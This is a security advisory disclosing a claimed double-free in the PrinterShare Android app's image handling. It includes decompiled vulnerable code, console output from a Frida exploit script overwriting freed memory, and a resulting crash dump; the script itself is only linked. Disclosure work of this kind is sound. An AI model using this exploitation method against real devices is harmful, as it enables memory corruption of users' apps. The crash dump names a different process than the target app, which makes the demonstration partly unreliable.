Affected Systems
Discovered By
Vulnerability Details
Vulnerability Description
A double-free condition occurs during the cleanup of temporary image files, which can be exploited to achieve memory corruption and potentially arbitrary code execution.
Technical Description
- Performed on Android 13 aarch64 - Samsung Rooted (Galaxy Tab A7 Lite)
- Using Frida client on Ubuntu 24.04 LTS - Frida server on Samsung Rooted Device.
- Playstore location: https://play.google.com/store/apps/details?id=com.dynamixsoftware.printershare&hl=en-US
- The target Activity is exported true. Which means any application may interact with it, given that permissions are provided.
The vulnerability is in the bitmap handling in
ActivityPrintPictures. The v1() method loads bitmaps from files
or content URIs. The method then calls x1() after attempting to
decode a bitmap. In the exception handler for OutOfMemoryError,
it recycles the bitmap.
The x1() method (visible in the Frida hooks) creates a 512x512
bitmap and immediately recycles it. An OutOfMemoryError happens
during bitmap loading in v1(); the bitmap is recycled in the
error handler.
public Bitmap v1(l lVar) {
Bitmap bitmap = null;
boolean z2 = false;
for (int i3 = 0; i3 < 3; i3++) {
try {
B.e();
BitmapFactory.Options options = new BitmapFactory.Options();
options.inPreferredConfig = Bitmap.Config.ARGB_8888;
options.inDither = false;
if (i3 > 0) {
options.inSampleSize = 1 << i3;
}
InputStream fileInputStream = lVar.f5200c != null ? new FileInputStream(lVar.f5200c) : getContentResolver().openInputStream(lVar.f5198a);
if (fileInputStream != null) {
bitmap = BitmapFactory.decodeStream(fileInputStream, null, options);
fileInputStream.close();
}
x1();
break;
} catch (IOException e3) {
e3.printStackTrace();
B.A(e3);
} catch (OutOfMemoryError unused) {
if (bitmap != null) {
bitmap.recycle();
bitmap = null;
}
if (!z2 && i3 > 0) {
B.a();
z2 = true;
}
}
}
return bitmap;
}Then x1() is called which creates and recycles another bitmap.
private void x1() {
Bitmap createBitmap = Bitmap.createBitmap(512, 512, Bitmap.Config.ARGB_8888);
if (createBitmap != null) {
createBitmap.recycle();
}
}The Android memory allocator may reuse the same memory block, which results in the same address being freed twice (double-free).
Demonstrating the leaking of memory by running the frida script. This first intercepts freed memory chunks, then writes to that memory and monitors the cache.
$ frida -U -f com.dynamixsoftware.printershare -l exploit.js
____
/ _ | Frida 16.6.5 - A world-class dynamic instrumentation toolkit
| (_| |
> _ | Commands:
/_/ |_| help -> Displays the help system
. . . . object? -> Display information about 'object'
. . . . exit/quit -> Exit
. . . .
. . . . More info at https://frida.re/docs/home/
. . . .
. . . . Connected to SM T220 (id=R83X10JATAV)
Spawning `com.dynamixsoftware.printershare`...
[+] Found 'free' function at 0x78b4adbf30 in module: libc.so
[+] Double-free exploitation script initialized
[+] Targeting the v1()->x1() bitmap handling vulnerability
[+] Waiting for free() calls to intercept...
Spawned `com.dynamixsoftware.printershare`. Resuming main thread!
[SM T220::com.dynamixsoftware.printershare ]->
...SNIP...
=== Memory at 0xb400007820205700 AFTER overwrite ===
0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
00000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000010 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000020 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000030 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000040 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000050 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000060 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000070 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
[+] Immediate exploitation succeeded for 0xb400007820205700
=== Memory at 0xb4000078202ad320 BEFORE overwrite ===
0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
00000000 64 61 6c 76 69 6b 2f 73 79 73 74 65 6d 2f 56 4d dalvik/system/VM
00000010 52 75 6e 74 69 6d 65 00 65 61 64 3b 00 00 00 00 Runtime.ead;....
00000020 10 71 a1 1d 78 00 00 00 ff ff ff ff ff ff ff ff .q..x...........
00000030 00 00 00 00 00 00 00 00 20 d3 2a 20 78 00 00 b4 ........ .* x...
00000040 01 00 00 00 02 00 00 00 08 8a 31 20 78 00 00 b4 ..........1 x...
00000050 00 00 00 00 00 00 00 00 60 d2 2a 20 78 00 00 b4 ........`.* x...
00000060 41 84 07 1d 78 00 00 00 00 66 2f 20 78 00 00 b4 A...x....f/ x...
00000070 00 00 00 00 00 00 00 00 98 d2 2a 20 78 00 00 b4 ..........* x...
[+] Successfully wrote 500 bytes to 0xb4000078202ad320
=== Memory at 0xb4000078202ad320 AFTER overwrite ===
0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
00000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000010 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000020 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000030 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000040 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000050 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000060 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000070 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
[+] Immediate exploitation succeeded for 0xb4000078202ad320
=== Memory at 0xb4000078202ad300 BEFORE overwrite ===
0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
00000000 4c 64 61 6c 76 69 6b 2f 73 79 73 74 65 6d 2f 56 Ldalvik/system/V
00000010 4d 52 75 6e 74 69 6d 65 3b 00 00 00 1e 00 00 00 MRuntime;.......
00000020 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000030 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000040 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000050 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000060 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000070 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
[+] Successfully wrote 500 bytes to 0xb4000078202ad300
=== Memory at 0xb4000078202ad300 AFTER overwrite ===
0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
00000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000010 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000020 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000030 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000040 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000050 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000060 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000070 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
[+] Immediate exploitation succeeded for 0xb4000078202ad300
=== Memory at 0xb4000078202ad2e0 BEFORE overwrite ===
0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
00000000 64 61 6c 76 69 6b 2e 73 79 73 74 65 6d 2e 56 4d dalvik.system.VM
00000010 52 75 6e 74 69 6d 65 00 61 64 00 20 78 00 00 b4 Runtime.ad. x...
00000020 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000030 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000040 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000050 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000060 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000070 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
[+] Successfully wrote 500 bytes to 0xb4000078202ad2e0
=== Memory at 0xb4000078202ad2e0 AFTER overwrite ===
0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
00000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000010 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000020 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000030 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000040 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000050 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000060 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000070 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
[+] Immediate exploitation succeeded for 0xb4000078202ad2e0
Process crashed: Bad access due to invalid address
***
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
Build fingerprint: 'samsung/gta7litewifixx/gta7litewifi:13/TP1A.220624.014/T220XXS6CWL2:user/release-keys'
Revision: '0'
ABI: 'arm64'
Processor: '0'
Timestamp: 2025-03-02 10:54:25.642520460-0800
Process uptime: 3s
Cmdline: com.samsung.android.scs
pid: 32625, tid: 32625, name: ung.android.scs >>> com.samsung.android.scs <<<
uid: 10243
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x0041414141414140
x0 0000000000000001 x1 4141414141414141 x2 0000000072a27ffc x3 0000000000000001
x4 0000007feb0e8530 x5 000000781d065ee0 x6 000000000000001a x7 0000000000000018
x8 0000007feb0e87c0 x9 4141414141414140 x10 0000007feb0e8150 x11 0000000000000006
x12 0000000000000069 x13 000000781dc0e180 x14 000000781dc0c598 x15 0000000000000000
x16 0000000020000001 x17 0000000000000000 x18 00000078ccb6a000 x19 b400007820205650
x20 b400007820205660 x21 0000000072e625d0 x22 4141414141414141 x23 000000781d776d80
x24 b4000078202cd400 x25 00000078cc4c1000 x26 000000781dc0d000 x27 0000007feb0e8960
x28 b400007820244800 x29 0000007feb0e8900
lr 000000781d2cc408 sp 0000007feb0e86d0 pc 000000781d2cc190 pst 0000000080000000
backtrace:
#00 pc 00000000002cc190 /apex/com.android.art/lib64/libart.so (artQuickResolutionTrampoline+2764) (BuildId: 629e0ffca501d809c29dbbeef2f512d3)
#01 pc 000000000037ee08 /apex/com.android.art/lib64/libart.so (art_quick_resolution_trampoline+88) (BuildId: 629e0ffca501d809c29dbbeef2f512d3)
#02 pc 0000000000780108 /apex/com.android.art/lib64/libart.so (nterp_helper+152) (BuildId: 629e0ffca501d809c29dbbeef2f512d3)
#03 pc 000000000003fb3a /apex/com.android.conscrypt/javalib/conscrypt.jar (com.android.org.conscrypt.TrustedCertificateStore.setDefaultUserDirectory+14)
#04 pc 0000000000b716dc /data/misc/apexdata/com.android.art/dalvik-cache/arm64/boot.oat (android.app.ActivityThread.main+764)
***
[SM T220::com.dynamixsoftware.printershare ]->Mitigation and Remediation Recommendation
No response from vendor. There are no known mitigations to end-users of the affected application versions.
Credit
This vulnerability was discovered by Felix Segoviano of KoreLogic, Inc.
Proof of Concept
URL: https://www.korelogic.com/advisories/KL-001-2025-005.poc.js.txt
SHA256sum: 596c119c3b1ef6749d59ff5def5b2e88bca04dde15e86683d074d259458519da
The contents of this advisory are copyright(c) 2025 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/
KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html
Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy
Disclosure Timeline
KoreLogic requests security contact from vendor via {info,support}@mobiledynamix.com.
KoreLogic requests security contact from vendor via {info,support}@mobiledynamix.com.
KoreLogic submits vulnerability details to vendor via {info,support}@mobiledynamix.com.
KoreLogic public disclosure.
Responsible Disclosure
KoreLogic follows responsible disclosure practices. All vulnerabilities are reported to affected vendors with appropriate time for remediation before public disclosure.